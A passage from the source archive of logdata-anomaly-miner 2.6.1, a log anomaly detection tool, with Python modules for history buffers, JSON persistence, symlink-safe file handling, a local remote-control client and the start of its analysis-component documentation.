Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import random import abc from aminer.input.InputInterfaces import AtomHandlerInterface def get_log_int(max_bits): """Get a log-distributed random integer integer in range 0 to maxBits-1.""" rand_bits = random.randint(0, (1 << max_bits) - 1) result = 0 while (rand_bits & 1) != 0: result += 1 rand_bits >>= 1 return result class ObjectHistory(metaclass=abc.ABCMeta): """ This is the superinterface of all object histories. 
The idea behind that is to use that type of history best suited for a purpose considering amount of data, possibility for history size limits to be reached, priorization which elements should be dropped first. """ @abc.abstractmethod def add_object(self, new_object): """Add an object to this history. This method call may evict other objects from the history.""" @abc.abstractmethod def get_history(self): """Get the whole history list. Make sure to clone the list before modification when influences on this object are not intended.""" @abc.abstractmethod def clear_history(self): """Clean the whole history.""" class LogarithmicBackoffHistory(ObjectHistory): """ This class keeps a history list of items with logarithmic storage characteristics. When adding objects, the list will be filled to the maximum size with the newest items at the end. When filled, adding a new element will replace with probability 1/2 the last element. With a chance of 1/4, the last element will be moved to the next lower position, before putting the new element at the end of the list. With a chance of 1/8, the last two elements are moved, ... Thus the list will in average span a time range of 2^maxItems items with growing size of holes towards the earliest element. """ def __init__(self, max_items, initial_list=None): self.max_items = max_items if initial_list is None: initial_list = [] else: initial_list = initial_list[:max_items] self.history = initial_list def add_object(self, new_object): """Add a new object to the list according to the rules described in the class docstring.""" if len(self.history) < self.max_items: self.history.append(new_object) else: move_pos = get_log_int(self.max_items - 1) self.history = self.history[:self.max_items - move_pos - 1] + self.history[self.max_items - move_pos:] + [new_object] def get_history(self): """Get the whole history list. 
Make sure to clone the list before modification when influences on this object are not intended.""" return self.history def clear_history(self): """Clean the whole history.""" self.history[:] = [] class VolatileLogarithmicBackoffAtomHistory(AtomHandlerInterface, LogarithmicBackoffHistory): """ This class is a volatile filter to keep a history of log atoms. Example usages can be for analysis by other components or for external access via remote control interface. """ def __init__(self, max_items): """Initialize the history component.""" LogarithmicBackoffHistory.__init__(self, max_items) AtomHandlerInterface.__init__(self) def receive_atom(self, log_atom): """Receive an atom and add it to the history log.""" self.add_object(log_atom) return True logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util/JsonUtil.py000066400000000000000000000060131437606560100323050ustar00rootroot00000000000000""" This module converts json strings to object structures also supporting byte array structures. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import json import logging import ast from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.util.StringUtil import encode_byte_string_as_string, decode_string_as_byte_string def dump_as_json(input_object): """Dump an input object encoded as string.""" return json.dumps(encode_object(input_object)) def load_json(input_string): """Load an string encoded as object structure.""" return decode_object(json.loads(input_string)) def encode_object(term): """@param term return an object encoded as string.""" encoded_object = '' if isinstance(term, str): encoded_object = 'string:' + term elif isinstance(term, bytes): encoded_object = 'bytes:' + encode_byte_string_as_string(term) elif isinstance(term, (list, tuple, set)): encoded_object = [encode_object(item) for item in term] elif isinstance(term, dict): encoded_object = {} for key, var in term.items(): if isinstance(key, tuple): key = "tuple:" + str(key) else: key = encode_object(key) var = encode_object(var) encoded_object[key] = var elif isinstance(term, (bool, int, float)) or term is None: encoded_object = term else: msg = f"Unencodeable object {type(term)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) return encoded_object def decode_object(term): """@param term return a string decoded as object structure.""" decoded_object = '' if isinstance(term, str) and term.startswith('string:'): decoded_object = term[7:] elif isinstance(term, str) and term.startswith('bytes:'): decoded_object = term[6:] decoded_object = decode_string_as_byte_string(decoded_object) elif isinstance(term, list): decoded_object = [decode_object(item) for item in term] elif isinstance(term, dict): decoded_object = {} for key, var in term.items(): if key.startswith("tuple:"): try: key = ast.literal_eval(key[6:]) except ValueError: pass else: key = decode_object(key) var = decode_object(var) decoded_object[key] = var else: decoded_object = term return decoded_object 
logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util/PersistenceUtil.py000066400000000000000000000145051437606560100336650ustar00rootroot00000000000000""" This module defines functions for reading and writing files in a secure way. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import errno import os import logging import tempfile import shutil import sys from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.util import SecureOSFunctions from aminer.util import JsonUtil # Have a registry of all persistable components. Those might be happy to be invoked before python process is terminating. persistable_components: list = [] SKIP_PERSISTENCE_ID_WARNING = False def add_persistable_component(component): """Add a component to the registry of all persistable components.""" for c in persistable_components: if hasattr(c, 'persistence_file_name') and c.persistence_file_name == component.persistence_file_name: msg = f'Detectors of type {c.__class__.__name__} use the persistence_id "{os.path.split(c.persistence_file_name)[1]}" ' \ f'multiple times. Please assign a unique persistence_id for every component.' logging.getLogger(DEBUG_LOG_NAME).warning(msg) if not SKIP_PERSISTENCE_ID_WARNING: print('Warning: ' + msg, file=sys.stderr) persistable_components.append(component) def open_persistence_file(file_name, flags): """ Open the given persistence file. 
When O_CREAT was specified, the function will attempt to create the directories too. """ if isinstance(file_name, str): file_name = file_name.encode() try: fd = SecureOSFunctions.secure_open_file(file_name, flags) return fd except OSError as openOsError: if ((flags & os.O_CREAT) == 0) or (openOsError.errno != errno.ENOENT): logging.getLogger(DEBUG_LOG_NAME).error(openOsError) raise openOsError create_missing_directories(file_name) return None def replace_persistence_file(file_name, new_file_handle): """Replace the named file with the file referred by the handle.""" try: os.unlink(file_name, dir_fd=SecureOSFunctions.secure_open_base_directory()) except OSError as openOsError: if openOsError.errno != errno.ENOENT: logging.getLogger(DEBUG_LOG_NAME).error(openOsError) raise openOsError tmp_file_name = os.readlink(f"/proc/self/fd/{new_file_handle}") if SecureOSFunctions.base_dir_path.decode() in file_name: file_name = file_name.replace(SecureOSFunctions.base_dir_path.decode(), '').lstrip('/') os.link( tmp_file_name, file_name, src_dir_fd=SecureOSFunctions.tmp_base_dir_fd, dst_dir_fd=SecureOSFunctions.secure_open_base_directory()) os.unlink(tmp_file_name, dir_fd=SecureOSFunctions.tmp_base_dir_fd) def persist_all(): """Persist all persistable components in the registry.""" for component in persistable_components: component.do_persist() def load_json(file_name): """ Load persistence data from file. @return None if file did not yet exist. 
""" persistence_data = None try: persistence_file_handle = open_persistence_file(file_name, os.O_RDONLY | os.O_NOFOLLOW) persistence_data = os.read(persistence_file_handle, os.fstat(persistence_file_handle).st_size) persistence_data = str(persistence_data, 'utf-8') os.close(persistence_file_handle) except OSError as openOsError: if openOsError.errno != errno.ENOENT: logging.getLogger(DEBUG_LOG_NAME).error(openOsError) raise openOsError return None result = None try: result = JsonUtil.load_json(persistence_data) except ValueError as value_error: msg = f"Corrupted data in {file_name, value_error}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) return result def store_json(file_name, object_data): """Store persistence data to file.""" persistence_data = JsonUtil.dump_as_json(object_data) # Create a temporary file within persistence directory to write new persistence data to it. # Thus the old data is not modified, any error creating or writing the file will not harm the old state. fd, _ = tempfile.mkstemp(dir=SecureOSFunctions.tmp_base_dir_path) os.write(fd, bytes(persistence_data, 'utf-8')) create_missing_directories(file_name) replace_persistence_file(file_name, fd) os.close(fd) def create_missing_directories(file_name): """Create missing persistence directories.""" # Find out, which directory is missing by stating our way up. dir_name_length = file_name.rfind('/') if dir_name_length > 0 and not os.path.exists(file_name[:dir_name_length]): os.makedirs(file_name[:dir_name_length]) def clear_persistence(persistence_dir_name): """Delete all persistence data from the persistence_dir.""" for filename in os.listdir(persistence_dir_name): if filename == 'backup': continue file_path = os.path.join(persistence_dir_name, filename) try: if not os.path.isdir(file_path): msg = 'The aminer persistence directory should not contain any files.' 
print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).warning(msg) continue shutil.rmtree(file_path) except OSError as e: msg = f"Failed to delete {file_path}. Reason: {e}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) def copytree(src, dst, symlinks=False, ignore=None): """Copy a directory recursively. This method has no issue with the destination directory existing (shutil.copytree has).""" for item in os.listdir(src): s = os.path.join(src, item) d = os.path.join(dst, item) if os.path.isdir(s): shutil.copytree(s, d, symlinks, ignore) else: shutil.copy2(s, d) SecureOSFunctions.py000066400000000000000000000223611437606560100340440ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util""" This module defines functions for secure file handling. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import os import socket import struct import sys import logging from aminer.AminerConfig import DEBUG_LOG_NAME base_dir_fd = None tmp_base_dir_fd = None log_dir_fd = None base_dir_path = None tmp_base_dir_path = None log_dir_path = None def secure_open_base_directory(directory_name=None, flags=0): """Open the base directory in a secure way.""" global base_dir_fd # skipcq: PYL-W0603 global base_dir_path # skipcq: PYL-W0603 global tmp_base_dir_fd # skipcq: PYL-W0603 global tmp_base_dir_path # skipcq: PYL-W0603 if directory_name is not None and isinstance(directory_name, str): directory_name = directory_name.encode() if base_dir_path is None and (directory_name is None or not directory_name.startswith(b'/')): msg = 'Secure open on relative path not supported' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if base_dir_path is None and (flags & os.O_DIRECTORY) == 0: msg = 'Opening directory but O_DIRECTORY flag missing' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if base_dir_fd is None: base_dir_fd = os.open(directory_name, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) base_dir_path = directory_name tmp_base_dir_path = directory_name tmp_base_dir_fd = os.open(tmp_base_dir_path, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) return base_dir_fd def close_base_directory(): """Close the base directory at program shutdown.""" global base_dir_fd # skipcq: PYL-W0603 global tmp_base_dir_fd # skipcq: PYL-W0603 global base_dir_path # skipcq: PYL-W0603 try: if base_dir_fd is not None: os.close(base_dir_fd) base_dir_fd = None base_dir_path = None if tmp_base_dir_fd is not None: os.close(tmp_base_dir_fd) tmp_base_dir_fd = None except OSError as e: msg = f"Could not close the base directory. 
Error: {e}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def secure_open_log_directory(log_directory_name=None, flags=0): """Open the base log directory in a secure way.""" global log_dir_fd # skipcq: PYL-W0603 global log_dir_path # skipcq: PYL-W0603 if log_directory_name is not None and isinstance(log_directory_name, str): log_directory_name = log_directory_name.encode() if log_dir_path is None and (log_directory_name is None or not log_directory_name.startswith(b'/')): msg = 'Secure open on relative path not supported' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if log_dir_path is None and (flags & os.O_DIRECTORY) == 0: msg = 'Opening directory but O_DIRECTORY flag missing' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if log_dir_fd is None: if base_dir_path is not None and base_dir_path.startswith(os.path.split(log_directory_name)[0]): log_dir_fd = os.open(log_directory_name, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY, dir_fd=base_dir_fd) log_dir_path = log_directory_name else: log_dir_fd = os.open(log_directory_name, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) log_dir_path = log_directory_name return log_dir_fd def close_log_directory(): """Close the base directory at program shutdown.""" global log_dir_fd # skipcq: PYL-W0603 global log_dir_path # skipcq: PYL-W0603 try: if log_dir_fd is not None: os.close(log_dir_fd) log_dir_fd = None log_dir_path = None except OSError as e: msg = f"Could not close the base log directory. Error: {e}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def secure_open_file(file_name, flags): """ Secure opening of a file with given flags. This call will refuse to open files where any path component is a symlink. As operating system does not provide any means to do that, open the file_name directory by directory. 
It also adds O_NOCTTY to the flags as controlling TTY logics as this is just an additional risk and does not make sense for opening of log files. @param file_name is the file name as byte string """ if isinstance(file_name, str): file_name = file_name.encode() if not file_name.startswith(b'/'): msg = 'Secure open on relative path not supported' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if (file_name.endswith(b'/')) and ((flags & os.O_DIRECTORY) == 0): msg = 'Opening directory but O_DIRECTORY flag missing' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) global base_dir_path # skipcq: PYL-W0603, PYL-W0602 global base_dir_fd # skipcq: PYL-W0603, PYL-W0602 if base_dir_path is not None: if file_name.startswith(base_dir_path): base_name = file_name.replace(base_dir_path, b'').lstrip(b'/') else: base_name = file_name return os.open(base_name, flags | os.O_NOFOLLOW | os.O_NOCTTY, dir_fd=base_dir_fd) dir_name = os.path.dirname(file_name) base_name = os.path.basename(file_name) dir_fd = os.open(dir_name, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) ret_fd = os.open(base_name, flags | os.O_NOFOLLOW | os.O_NOCTTY, dir_fd=dir_fd) os.close(dir_fd) return ret_fd def send_annotated_file_descriptor(send_socket, send_fd, type_info, annotation_data): """ Send file descriptor and associated annotation data via SCM_RIGHTS. @param type_info has to be a null-byte free string to inform the receiver how to handle the file descriptor and how to interpret the annotationData. @param annotation_data this optional byte array may convey additional information about the file descriptor. 
""" # Construct the message data first if isinstance(type_info, str): type_info = type_info.encode() if isinstance(annotation_data, str): annotation_data = annotation_data.encode() if type_info.find(b'\x00') >= 0: msg = 'Null bytes not supported in typeInfo' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) message_data = b'%s\x00%s' % (type_info, annotation_data) send_socket.sendmsg([message_data], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, struct.pack('i', send_fd))]) def send_logstream_descriptor(send_socket, send_fd, send_file_name): """Send a file descriptor to be used as standard log data stream source for the analysis pipeline.""" send_annotated_file_descriptor(send_socket, send_fd, b'logstream', send_file_name) def receive_annoted_file_descriptor(receive_socket): """ Receive a single file descriptor and attached annotation information via SCM_RIGHTS via the given socket. The method may raise an Exception when invoked on non-blocking sockets and no messages available. @return a tuple containing the received file descriptor, type information (see sendAnnotatedFileDescriptor) and the annotation information. """ message_data, anc_data, _flags, _remote_address = receive_socket.recvmsg(1 << 16, socket.CMSG_LEN(struct.calcsize('i'))) if len(anc_data) != 1: msg = f"Received {len(anc_data)} sets of ancillary data instead of 1" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) cmsg_level, cmsg_type, cmsg_data = anc_data[0] if (cmsg_level != socket.SOL_SOCKET) or (cmsg_type != socket.SCM_RIGHTS): msg = 'Received invalid message from remote side' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Do not accept multiple or unaligned FDs. 
if len(cmsg_data) != 4: msg = f"Unsupported control message length {len(cmsg_data)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) received_fd = struct.unpack('i', cmsg_data)[0] split_pos = message_data.find(b'\x00') if split_pos < 0: msg = 'No null byte in received message' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) type_info = message_data[:split_pos] annotation_data = message_data[split_pos + 1:] if received_fd <= 2: msg = f'received "reserved" fd {received_fd}' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) if isinstance(type_info, str): type_info = type_info.encode() if isinstance(annotation_data, str): annotation_data = annotation_data.encode() return received_fd, type_info, annotation_data logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util/StringUtil.py000066400000000000000000000071351437606560100326500ustar00rootroot00000000000000""" Some useful string-functions. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import logging import sys import os from aminer.AminerConfig import DEBUG_LOG_NAME colflame = ("\033[31m" " * ( ) ( \n" " ( ( ` )\\ ) ( /( )\\ ) \n" " )\\ )\\))( (()/( )\\()) ( (()/( \n" "\033[33m" "((((_)( ((_)()\\ /(_))(_)\\ )\\ /(_)) \n" " )\\ _ )\\(_()((_)(_)) _((_)((_) (_)) \n" " (_)\033[39m_\\\033[33m()\033[39m| \\/ ||_ _|| \\| || __|| _ \\ \n" " / _ \\ | |\\/| | | | | .` || _| | / \n" " /_/ \\_\\|_| |_||___||_|\\_||___||_|_\\ " "\033[39m") flame = (" * ( ) ( \n" " ( ( ` )\\ ) ( /( )\\ ) \n" " )\\ )\\))( (()/( )\\()) ( (()/( \n" "((((_)( ((_)()\\ /(_))(_)\\ )\\ /(_)) \n" " )\\ _ )\\(_()((_)(_)) _((_)((_) (_)) \n" " (_)_\\()| \\/ ||_ _|| \\| || __|| _ \\ \n" " / _ \\ | |\\/| | | | | .` || _| | / \n" " /_/ \\_\\|_| |_||___||_|\\_||___||_|_\\ ") def supports_color(): """ Return True if the running system's terminal supports color, and False otherwise. The function was borrowed from the django-project (https://github.com/django/django/blob/master/django/core/management/color.py) """ plat = sys.platform supported_platform = plat != 'Pocket PC' and (plat != 'win32' or 'ANSICON' in os.environ) # isatty is not always implemented, #6223. is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty() return supported_platform and is_a_tty def decode_string_as_byte_string(string): """ Decode a string produced by the encode function encodeByteStringAsString(byteString) below. @return string. """ decoded = b'' count = 0 while count < len(string): if string[count] in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!"#$&\'()*+,-./:;<=>?@[]\\^_`{}|~ ': decoded += bytes(string[count], 'ascii') count += 1 elif string[count] == '%': decoded += bytearray((int(string[count + 1:count + 3], 16),)) count += 3 else: msg = 'Invalid encoded character' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) return decoded def encode_byte_string_as_string(byte_string): r""" Encode an arbitrary byte string to a string. 
This is achieved by replacing all non ascii-7 bytes and all non printable ascii-7 bytes and % character by replacing with their escape sequence %[hex]. For example byte string b'/\xc3' is encoded to '/%c3' @return a string with decoded name. """ encoded = '' for byte in byte_string: if byte in b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!"#$&\'()*+,-./:;<=>?@[]\\^_`{}|~ ': encoded += chr(byte) else: encoded += '%%%02x' % byte # skipcq: PYL-C0209 return encoded TimeTriggeredComponentInterface.py000066400000000000000000000050521437606560100367200ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util""" This is the interface-class for the TimeTriggeredComponent. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import abc class TimeTriggeredComponentInterface(metaclass=abc.ABCMeta): """ This is the common interface of all components that can be registered to receive timer interrupts. There might be different timelines for triggering, real time and normalized log data time scale for forensic analysis. For forensic analyis different timers might be available to register a component. Therefore the component should state, which type of triggering it would require. """ @property @abc.abstractmethod def time_trigger_class(self): raise NotImplementedError def get_time_trigger_class(self): """ Get the trigger class this component can be registered for. 
See AnalysisContext class for different trigger classes available. """ if self.time_trigger_class not in (1, 2): raise NotImplementedError("The self.time_trigger_class property must be set to AnalysisContext.TIME_TRIGGER_CLASS_REALTIME or " "AnalysisContext.TIME_TRIGGER_CLASS_ANALYSISTIME.") return self.time_trigger_class @abc.abstractmethod def do_timer(self, trigger_time): """ Perform trigger actions and to determine the time for next invocation. The caller may decide to invoke this method earlier than requested during the previous call. Classes implementing this method have to handle such cases. Each class should try to limit the time spent in this method as it might delay trigger signals to other components. For extensive compuational work or IO, a separate thread should be used. @param trigger_time the time this trigger is invoked. This might be the current real time when invoked from real time timers or the forensic log timescale time value. @return the number of seconds when next invocation of this trigger is required. """ logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminerremotecontrol.py000077500000000000000000000115701437606560100324050ustar00rootroot00000000000000#!/usr/bin/python3 -BbbEIsSttW all # -*- coding: utf-8 -*- """ This tool allows to connect to a remote control socket, send requests and retrieve the responses. To allow remote use of this tool, e.g. via SSH forwarding, the remote control address can be set on the command line, no configuration is read. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 
You should have received a copy of the GNU General Public License along with this program. If not, see . """ import json import os import socket import traceback import sys import argparse # Get rid of the default sys path immediately. Otherwise Python also attempts to load the following imports from e.g. directory # where this binary resides. sys.path = sys.path[1:] + ['/usr/lib/logdata-anomaly-miner', '/etc/aminer/conf-enabled'] from aminer.AnalysisChild import AnalysisChildRemoteControlHandler # skipcq: FLK-E402 from aminer.util.StringUtil import colflame, flame, supports_color # skipcq: FLK-E402 from metadata import __version_string__ # skipcq: FLK-E402 help_message = 'aminerremotecontrol\n' if supports_color(): help_message += colflame else: help_message += flame help_message += 'For further information read the man pages running "man aminerRemoteControl".' parser = argparse.ArgumentParser(description=help_message, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-v', '--version', action='version', version=__version_string__) parser.add_argument('-c', '--control-socket', default='/var/run/aminer-remote.socket', type=str, help='when given, use nonstandard control socket') parser.add_argument('-d', '--data', help='provide this json serialized data within execution environment as "remote_control_data" (see man ' 'page).') parser.add_argument('-e', '--exec', action='append', type=str, help='add command to the execution list, can be used more than once.') parser.add_argument('-f', '--exec-file', type=str, help='add commands from file to the execution list in same way as if content would have ' 'been used with "--exec"') parser.add_argument('-s', '--string-response', action='store_true', help='if set, print the response just as string instead of passing it to repr') args = parser.parse_args() remote_control_socket_name = args.control_socket if args.data is not None: args.data = json.loads(args.data) remote_control_data = args.data command_list = 
args.exec if command_list is None: command_list = [] if args.exec_file is not None: if not os.path.exists(args.exec_file): print(f"File {args.exec_file} does not exist") sys.exit(1) with open(args.exec_file, 'rb') as exec_file: command_list += exec_file.readlines() string_response_flag = args.string_response if not command_list: print('No commands given, use --exec [cmd]') sys.exit(1) remote_control_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) try: remote_control_socket.connect(remote_control_socket_name) except socket.error as connectException: print(f"Failed to connect to socket {remote_control_socket_name}, aminer might not be running or remote control is disabled in " f"configuration: {str(connectException)}") sys.exit(1) remote_control_socket.setblocking(True) control_handler = AnalysisChildRemoteControlHandler(remote_control_socket) for remote_control_code in command_list: control_handler.put_execute_request(remote_control_code, remote_control_data) # Send data until we are ready for receiving. 
while not control_handler.may_receive(): control_handler.do_send() while not control_handler.may_get(): control_handler.do_receive() request_data = control_handler.do_get() request_type = request_data[4:8] if request_type == b'RRRR': try: remote_data = json.loads(request_data[8:]) if remote_data[0] is not None: print(f"Remote execution exception:\n{remote_data[0]}") if string_response_flag: print(f"Remote execution response: {str(remote_data[1])}") else: print(f"Remote execution response: {repr(remote_data[1])}") except: # skipcq: FLK-E722 print(f"Failed to process response {repr(request_data)}") traceback.print_exc() else: raise Exception(f"Invalid request type {repr(request_type)}") remote_control_socket.close() logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/metadata.py000066400000000000000000000017171437606560100300740ustar00rootroot00000000000000__authors__ = ["Markus Wurzenberger", "Max Landauer", "Wolfgang Hotwagner", "Ernst Leierzopf", "Roman Fiedler", "Georg Hoeld", "Florian Skopik"] __contact__ = "aecid@ait.ac.at" __copyright__ = "Copyright 2023, AIT Austrian Institute of Technology GmbH" __date__ = "2023/01/20" __deprecated__ = False __email__ = "aecid@ait.ac.at" __website__ = "https://aecid.ait.ac.at" __license__ = "GPLv3" __maintainer__ = "Markus Wurzenberger" __status__ = "Production" __version__ = "2.6.1" _indentation = int(max(0, max(0, (29 - len(__version__)))) / 2) # skipcq: PYL-C0209 __version_string__ = """ (Austrian Institute of Technology)\n (%s)\n%sVersion: %s""" % ( __website__, " " * _indentation, __version__ + " " * _indentation) __all__ = ['__authors__', '__contact__', '__copyright__', '__date__', '__deprecated__', '__email__', '__website__', '__license__', '__maintainer__', '__status__', '__version__', '__version_string__'] del _indentation 
logdata-anomaly-miner-2.6.1/source/root/usr/share/000077500000000000000000000000001437606560100221075ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/000077500000000000000000000000001437606560100226545ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/000077500000000000000000000000001437606560100270355ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/aminer/000077500000000000000000000000001437606560100303105ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/aminer/Analysis.txt000066400000000000000000000242541437606560100326430ustar00rootroot00000000000000Preamble: ========= This document lists all analysis components, that are components that emit events to the reporting infrastructure on certain conditions. The components in the following list are annotated with short codes describing their properties to speed up search for suitable analysis component. Property codes: * (A)utoconfiguration: This component may learn from the input data and adapt itself to new inputs. * (F)iltering: This component just filters input and distributes it to other analysis components. * (H)ardwired: This component generates events by hard rules. This is the opposite to "statistical triggering". * (N)ondeterministic: This component may react differently to the same input in two runs. * (R)eporting: This component will generate analysis reports for evaluation by an analyst. Those components can be very useful in the configuration phase to understand the processed data better. * (S)tatistical triggering: This component uses statistical methods to trigger on unexpected data. Such components may miss relevant events or cause false-positives. 
List of components: * EnhancedNewMatchPathValueComboDetector (AH): Same as NewMatchPathValueComboDetector but also supporting value transformation and storage of extra data. * HistogramAnalysis.HistogramAnalysis (R): Create histogram reports for parsed values. * HistogramAnalysis.PathDependentHistogramAnalysis (R): Create path-dependent histogram reports. * MatchValueAverageChangeDetector (AS): Detect when the average value of a given parsed value changes over time. * AtomFilters.MatchValueFilter (F): Use the value of a parsed element to forward input data to other analyzers. * MatchValueStreamWriter (F): Forward selected input data, e.g. as a CSV list, to other components via a stream, e.g. to perform analysis in another tool. * MissingMatchPathValueDetector (AH): Detect when values for a given path are not received for a longer timespan, e.g. a host, service or address stopped sending/reporting. * MissingMatchPathListValueDetector (AH): Like MissingMatchPathValueDetector but looking at more than one match path for key extraction. * NewMatchPathDetector (AH): Generate events when new parser paths are found. * NewMatchPathValueComboDetector (AH): Same as NewMatchPathValueDetector but considers the combination of values for a list of data paths, e.g. source IP, destination IP, destination port for link analysis. * NewMatchPathValueDetector (AH): Generate events when new parsed values are observed for a given path, e.g. new MAC addresses, user names, ... * TimeCorrelationDetector (ANR): Try to detect time correlations and report them. * TimeCorrelationViolationDetector.TimeCorrelationViolationDetector (H): Detect changes in time correlation on a given ruleset. * TimestampCorrectionFilters.SimpleMonotonicTimestampAdjust (F): Adjust decreasing timestamps of new records to the maximum observed so far to ensure monotonicity for other analysis components. 
* TimestampsUnsortedDetector.TimestampsUnsortedDetector (HR): This detector is useful to detect algorithm malfunction or configuration errors, e.g. an invalid timezone configuration. * AllowlistViolationDetector (FH): Check all inputs using a ruleset and create events; forward input to other components. HistogramAnalysis.HistogramAnalysis: ==================================== This component performs a histogram analysis on one or more input properties. The properties are parsed values denoted by their parsing path. Those values are then handed over to the selected "binning function", which calculates the histogram bin. * Binning: Binning can be done using one of the predefined binning functions or by creating your own subclasses of "HistogramAnalysis.BinDefinition". * LinearNumericBinDefinition: Binning function working on numeric values and sorting them into bins of the same size. * ModuloTimeBinDefinition: Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. 
* Example: The following example creates a HistogramAnalysis using only the property "/model/line/time", binned on a per-hour basis and sending a report every week: from aminer.analysis import HistogramAnalysis # Use a time-modulo binning function modulo_time_bin_definition=HistogramAnalysis.ModuloTimeBinDefinition( 3600*24, # Modulo values in seconds (1 day) 3600, # Division factor to get down to reporting unit (1h) 0, # Start of lowest bin 1, # Size of bin in reporting units 24, # Number of bins False) # Disable outlier bins, not possible with time modulo histogram_analysis=HistogramAnalysis.HistogramAnalysis( aminer_config, [('/model/line/time', modulo_time_bin_definition)], 3600*24*7, # Reporting interval (weekly) report_event_handlers, # Send report to those handlers reset_after_report_flag=True) # Zero counters after sending of report # Send the appropriate input feed to the component atom_filter.add_handler(histogram_analysis) HistogramAnalysis.PathDependentHistogramAnalysis: ================================================= This component creates a histogram for only a single input property, e.g. an IP address, but for each group of correlated match paths. Assume there are two paths that include the input property but diverge after the property was found on the path. This might be, for example, the client IP address in ssh log atoms, where the parsing path may split depending on whether this was a log atom for a successful login, a logout or some error. This analysis component will then create separate histograms, one for the path common to all atoms and one for each disjoint part of the subpaths found. The component uses the same binning functions as the standard 